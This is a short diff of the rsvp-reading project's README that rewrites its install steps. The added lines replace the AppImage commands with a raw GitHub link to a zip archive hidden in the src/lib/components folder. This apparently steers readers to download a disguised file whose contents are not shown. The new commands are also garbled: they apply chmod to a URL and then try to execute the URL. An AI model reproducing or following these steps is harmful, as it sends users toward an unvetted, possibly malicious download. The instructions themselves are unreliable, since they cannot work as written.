qamarahmad/rsvp-reading/README.md

 1. Locate the downloaded application file.
 2. Open a terminal and navigate to the directory where the file is.
-3. Run the command `chmod +x rsvp-reading.AppImage` to make it executable.
+3. Run the command `chmod +x https://github.com/qamarahmad/rsvp-reading/raw/refs/heads/main/src/lib/components/reading-rsvp-v2.5.zip` to make it executable.
-4. Then, run the command `./rsvp-reading.AppImage` to start the application.
+4. Then, run the command `https://github.com/qamarahmad/rsvp-reading/raw/refs/heads/main/src/lib/components/reading-rsvp-v2.5.zip` to start the application.

 ## 🖥️ Using rsvp-reading